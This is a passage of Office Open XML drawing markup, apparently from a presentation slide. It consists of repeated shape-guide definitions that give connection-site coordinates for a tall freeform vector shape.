              <a:gd name="connsiteY71" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 620650 w 1508539"/>
              <a:gd name="connsiteY72" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 619534 w 1508539"/>
              <a:gd name="connsiteY73" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 621267 w 1508539"/>
              <a:gd name="connsiteY74" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 625010 w 1508539"/>
              <a:gd name="connsiteY75" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 624476 w 1508539"/>
              <a:gd name="connsiteY76" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 633172 w 1508539"/>
              <a:gd name="connsiteY77" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 640518 w 1508539"/>
              <a:gd name="connsiteY78" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 639814 w 1508539"/>
              <a:gd name="connsiteY79" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 643257 w 1508539"/>
              <a:gd name="connsiteY80" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 650795 w 1508539"/>
              <a:gd name="connsiteY81" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 652466 w 1508539"/>
              <a:gd name="connsiteY82" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 670029 w 1508539"/>
              <a:gd name="connsiteY83" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 670454 w 1508539"/>
              <a:gd name="connsiteY84" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 672277 w 1508539"/>
              <a:gd name="connsiteY85" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 659112 w 1508539"/>
              <a:gd name="connsiteY86" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 659613 w 1508539"/>
              <a:gd name="connsiteY87" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 647213 w 1508539"/>
              <a:gd name="connsiteY88" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 632398 w 1508539"/>
              <a:gd name="connsiteY89" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 633063 w 1508539"/>
              <a:gd name="connsiteY90" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 623931 w 1508539"/>
              <a:gd name="connsiteY91" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 610540 w 1508539"/>
              <a:gd name="connsiteY92" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 583270 w 1508539"/>
              <a:gd name="connsiteY93" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 525884 w 1508539"/>
              <a:gd name="connsiteY94" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 474802 w 1508539"/>
              <a:gd name="connsiteY95" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 454896 w 1508539"/>
              <a:gd name="connsiteY96" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 445619 w 1508539"/>
              <a:gd name="connsiteY97" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 432580 w 1508539"/>
              <a:gd name="connsiteY98" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 438579 w 1508539"/>
              <a:gd name="connsiteY99" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 441191 w 1508539"/>
              <a:gd name="connsiteY100" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 417520 w 1508539"/>
              <a:gd name="connsiteY101" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 407407 w 1508539"/>
              <a:gd name="connsiteY102" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 391624 w 1508539"/>
              <a:gd name="connsiteY103" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 389082 w 1508539"/>
              <a:gd name="connsiteY104" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 390075 w 1508539"/>
              <a:gd name="connsiteY105" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 381881 w 1508539"/>
              <a:gd name="connsiteY106" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 363059 w 1508539"/>
              <a:gd name="connsiteY107" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 339616 w 1508539"/>
              <a:gd name="connsiteY108" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 293415 w 1508539"/>
              <a:gd name="connsiteY109" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 265726 w 1508539"/>
              <a:gd name="connsiteY110" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 264852 w 1508539"/>
              <a:gd name="connsiteY111" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 245647 w 1508539"/>
              <a:gd name="connsiteY112" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 258727 w 1508539"/>
              <a:gd name="connsiteY113" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 251469 w 1508539"/>
              <a:gd name="connsiteY114" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 237554 w 1508539"/>
              <a:gd name="connsiteY115" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 245861 w 1508539"/>
              <a:gd name="connsiteY116" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 247049 w 1508539"/>
              <a:gd name="connsiteY117" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 251734 w 1508539"/>
              <a:gd name="connsiteY118" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 244016 w 1508539"/>
              <a:gd name="connsiteY119" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 233322 w 1508539"/>
              <a:gd name="connsiteY120" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 222058 w 1508539"/>
              <a:gd name="connsiteY121" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 223514 w 1508539"/>
              <a:gd name="connsiteY122" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 225750 w 1508539"/>
              <a:gd name="connsiteY123" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 218379 w 1508539"/>
              <a:gd name="connsiteY124" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 187787 w 1508539"/>
              <a:gd name="connsiteY125" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 166737 w 1508539"/>
              <a:gd name="connsiteY126" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 166295 w 1508539"/>
              <a:gd name="connsiteY127" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 151966 w 1508539"/>
              <a:gd name="connsiteY128" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 137385 w 1508539"/>
              <a:gd name="connsiteY129" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 142396 w 1508539"/>
              <a:gd name="connsiteY130" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 128338 w 1508539"/>
              <a:gd name="connsiteY131" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 128019 w 1508539"/>
              <a:gd name="connsiteY132" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 107645 w 1508539"/>
              <a:gd name="connsiteY133" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 106893 w 1508539"/>
              <a:gd name="connsiteY134" fmla="*/ 465389 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 89816 w 1508539"/>
              <a:gd name="connsiteY135" fmla="*/ 424699 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 90191 w 1508539"/>
              <a:gd name="connsiteY136" fmla="*/ 404917 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 70148 w 1508539"/>
              <a:gd name="connsiteY137" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 36452 w 1508539"/>
              <a:gd name="connsiteY138" fmla="*/ 268519 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 23935 w 1508539"/>
              <a:gd name="connsiteY139" fmla="*/ 160886 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 19312 w 1508539"/>
              <a:gd name="connsiteY140" fmla="*/ 47336 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 0 w 1508539"/>
              <a:gd name="connsiteY14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64248 w 1508539"/>
              <a:gd name="connsiteY7" fmla="*/ 6574442 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 164588 w 1508539"/>
              <a:gd name="connsiteY8" fmla="*/ 6568530 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 166997 w 1508539"/>
              <a:gd name="connsiteY9" fmla="*/ 6560674 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 201349 w 1508539"/>
              <a:gd name="connsiteY10" fmla="*/ 6530567 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 215389 w 1508539"/>
              <a:gd name="connsiteY11" fmla="*/ 6478062 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 226078 w 1508539"/>
              <a:gd name="connsiteY12" fmla="*/ 6460325 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 233311 w 1508539"/>
              <a:gd name="connsiteY13" fmla="*/ 6451488 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 234746 w 1508539"/>
              <a:gd name="connsiteY14" fmla="*/ 6451348 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 239104 w 1508539"/>
              <a:gd name="connsiteY15" fmla="*/ 6414240 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 241880 w 1508539"/>
              <a:gd name="connsiteY16" fmla="*/ 6384857 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 240591 w 1508539"/>
              <a:gd name="connsiteY17" fmla="*/ 6367510 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 244471 w 1508539"/>
              <a:gd name="connsiteY18" fmla="*/ 6349778 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 246136 w 1508539"/>
              <a:gd name="connsiteY19" fmla="*/ 6348250 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 262170 w 1508539"/>
              <a:gd name="connsiteY20" fmla="*/ 6281972 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 290557 w 1508539"/>
              <a:gd name="connsiteY21" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 314428 w 1508539"/>
              <a:gd name="connsiteY22" fmla="*/ 6113913 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 318721 w 1508539"/>
              <a:gd name="connsiteY23" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 363126 w 1508539"/>
              <a:gd name="connsiteY24" fmla="*/ 5934687 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 408411 w 1508539"/>
              <a:gd name="connsiteY25" fmla="*/ 5704905 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 431404 w 1508539"/>
              <a:gd name="connsiteY26" fmla="*/ 5665173 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 465121 w 1508539"/>
              <a:gd name="connsiteY27" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 494626 w 1508539"/>
              <a:gd name="connsiteY28" fmla="*/ 5476393 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 525819 w 1508539"/>
              <a:gd name="connsiteY29" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 541800 w 1508539"/>
              <a:gd name="connsiteY30" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 575293 w 1508539"/>
              <a:gd name="connsiteY31" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 584892 w 1508539"/>
              <a:gd name="connsiteY32" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 596118 w 1508539"/>
              <a:gd name="connsiteY33" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 597138 w 1508539"/>
              <a:gd name="connsiteY34" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 604479 w 1508539"/>
              <a:gd name="connsiteY35" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 607782 w 1508539"/>
              <a:gd name="connsiteY36" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 608766 w 1508539"/>
              <a:gd name="connsiteY37" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 604400 w 1508539"/>
              <a:gd name="connsiteY38" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 611077 w 1508539"/>
              <a:gd name="connsiteY39" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 608010 w 1508539"/>
              <a:gd name="connsiteY40" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 614840 w 1508539"/>
              <a:gd name="connsiteY41" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 621876 w 1508539"/>
              <a:gd name="connsiteY42" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 624607 w 1508539"/>
              <a:gd name="connsiteY43" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 621311 w 1508539"/>
              <a:gd name="connsiteY44" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 622865 w 1508539"/>
              <a:gd name="connsiteY45" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 629774 w 1508539"/>
              <a:gd name="connsiteY46" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 625630 w 1508539"/>
              <a:gd name="connsiteY47" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 641033 w 1508539"/>
              <a:gd name="connsiteY48" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 646936 w 1508539"/>
              <a:gd name="connsiteY49" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 651669 w 1508539"/>
              <a:gd name="connsiteY50" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 652962 w 1508539"/>
              <a:gd name="connsiteY51" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 650769 w 1508539"/>
              <a:gd name="connsiteY52" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 646249 w 1508539"/>
              <a:gd name="connsiteY53" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 641332 w 1508539"/>
              <a:gd name="connsiteY54" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 637897 w 1508539"/>
              <a:gd name="connsiteY55" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 618550 w 1508539"/>
              <a:gd name="connsiteY56" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 622623 w 1508539"/>
              <a:gd name="connsiteY57" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 607879 w 1508539"/>
              <a:gd name="connsiteY58" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 609028 w 1508539"/>
              <a:gd name="connsiteY59" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 607604 w 1508539"/>
              <a:gd name="connsiteY60" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 593899 w 1508539"/>
              <a:gd name="connsiteY61" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 595497 w 1508539"/>
              <a:gd name="connsiteY62" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 588919 w 1508539"/>
              <a:gd name="connsiteY63" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 590250 w 1508539"/>
              <a:gd name="connsiteY64" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 594604 w 1508539"/>
              <a:gd name="connsiteY65" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 599682 w 1508539"/>
              <a:gd name="connsiteY66" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 622276 w 1508539"/>
              <a:gd name="connsiteY67" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 621701 w 1508539"/>
              <a:gd name="connsiteY68" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 622008 w 1508539"/>
              <a:gd name="connsiteY69" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 622035 w 1508539"/>
              <a:gd name="connsiteY70" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 620650 w 1508539"/>
              <a:gd name="connsiteY71" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 619534 w 1508539"/>
              <a:gd name="connsiteY72" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 621267 w 1508539"/>
              <a:gd name="connsiteY73" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 625010 w 1508539"/>
              <a:gd name="connsiteY74" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 624476 w 1508539"/>
              <a:gd name="connsiteY75" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 633172 w 1508539"/>
              <a:gd name="connsiteY76" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 640518 w 1508539"/>
              <a:gd name="connsiteY77" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 639814 w 1508539"/>
              <a:gd name="connsiteY78" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 643257 w 1508539"/>
              <a:gd name="connsiteY79" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 650795 w 1508539"/>
              <a:gd name="connsiteY80" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 652466 w 1508539"/>
              <a:gd name="connsiteY81" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 670029 w 1508539"/>
              <a:gd name="connsiteY82" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 670454 w 1508539"/>
              <a:gd name="connsiteY83" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 672277 w 1508539"/>
              <a:gd name="connsiteY84" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 659112 w 1508539"/>
              <a:gd name="connsiteY85" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 659613 w 1508539"/>
              <a:gd name="connsiteY86" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 647213 w 1508539"/>
              <a:gd name="connsiteY87" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 632398 w 1508539"/>
              <a:gd name="connsiteY88" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 633063 w 1508539"/>
              <a:gd name="connsiteY89" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 623931 w 1508539"/>
              <a:gd name="connsiteY90" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 610540 w 1508539"/>
              <a:gd name="connsiteY91" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 583270 w 1508539"/>
              <a:gd name="connsiteY92" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 525884 w 1508539"/>
              <a:gd name="connsiteY93" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 474802 w 1508539"/>
              <a:gd name="connsiteY94" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 454896 w 1508539"/>
              <a:gd name="connsiteY95" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 445619 w 1508539"/>
              <a:gd name="connsiteY96" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 432580 w 1508539"/>
              <a:gd name="connsiteY97" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 438579 w 1508539"/>
              <a:gd name="connsiteY98" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 441191 w 1508539"/>
              <a:gd name="connsiteY99" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 417520 w 1508539"/>
              <a:gd name="connsiteY100" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 407407 w 1508539"/>
              <a:gd name="connsiteY101" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 391624 w 1508539"/>
              <a:gd name="connsiteY102" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 389082 w 1508539"/>
              <a:gd name="connsiteY103" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 390075 w 1508539"/>
              <a:gd name="connsiteY104" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 381881 w 1508539"/>
              <a:gd name="connsiteY105" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 363059 w 1508539"/>
              <a:gd name="connsiteY106" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 339616 w 1508539"/>
              <a:gd name="connsiteY107" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 293415 w 1508539"/>
              <a:gd name="connsiteY108" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 265726 w 1508539"/>
              <a:gd name="connsiteY109" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 264852 w 1508539"/>
              <a:gd name="connsiteY110" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 245647 w 1508539"/>
              <a:gd name="connsiteY111" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 258727 w 1508539"/>
              <a:gd name="connsiteY112" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 251469 w 1508539"/>
              <a:gd name="connsiteY113" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 237554 w 1508539"/>
              <a:gd name="connsiteY114" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 245861 w 1508539"/>
              <a:gd name="connsiteY115" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 247049 w 1508539"/>
              <a:gd name="connsiteY116" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 251734 w 1508539"/>
              <a:gd name="connsiteY117" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 244016 w 1508539"/>
              <a:gd name="connsiteY118" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 233322 w 1508539"/>
              <a:gd name="connsiteY119" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 222058 w 1508539"/>
              <a:gd name="connsiteY120" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 223514 w 1508539"/>
              <a:gd name="connsiteY121" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 225750 w 1508539"/>
              <a:gd name="connsiteY122" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 218379 w 1508539"/>
              <a:gd name="connsiteY123" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 187787 w 1508539"/>
              <a:gd name="connsiteY124" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 166737 w 1508539"/>
              <a:gd name="connsiteY125" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 166295 w 1508539"/>
              <a:gd name="connsiteY126" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 151966 w 1508539"/>
              <a:gd name="connsiteY127" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 137385 w 1508539"/>
              <a:gd name="connsiteY128" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 142396 w 1508539"/>
              <a:gd name="connsiteY129" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 128338 w 1508539"/>
              <a:gd name="connsiteY130" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 128019 w 1508539"/>
              <a:gd name="connsiteY131" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 107645 w 1508539"/>
              <a:gd name="connsiteY132" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 106893 w 1508539"/>
              <a:gd name="connsiteY133" fmla="*/ 465389 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 89816 w 1508539"/>
              <a:gd name="connsiteY134" fmla="*/ 424699 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 90191 w 1508539"/>
              <a:gd name="connsiteY135" fmla="*/ 404917 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 70148 w 1508539"/>
              <a:gd name="connsiteY136" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 36452 w 1508539"/>
              <a:gd name="connsiteY137" fmla="*/ 268519 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 23935 w 1508539"/>
              <a:gd name="connsiteY138" fmla="*/ 160886 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 19312 w 1508539"/>
              <a:gd name="connsiteY139" fmla="*/ 47336 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 0 w 1508539"/>
              <a:gd name="connsiteY140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4248 w 1508539"/>
              <a:gd name="connsiteY6" fmla="*/ 6574442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164588 w 1508539"/>
              <a:gd name="connsiteY7" fmla="*/ 6568530 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 340301 w 1508539"/>
              <a:gd name="connsiteY8" fmla="*/ 6572601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40301 w 1508539"/>
              <a:gd name="connsiteY8" fmla="*/ 6572601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226078 w 1508539"/>
              <a:gd name="connsiteY11" fmla="*/ 6460325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504057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1872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81826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81826 w 1508539"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 293326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81826 w 1508539"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 293326 w 1508539"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 318065 w 1508539"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589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164830 w 1491612"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1491612 w 1491612"/>
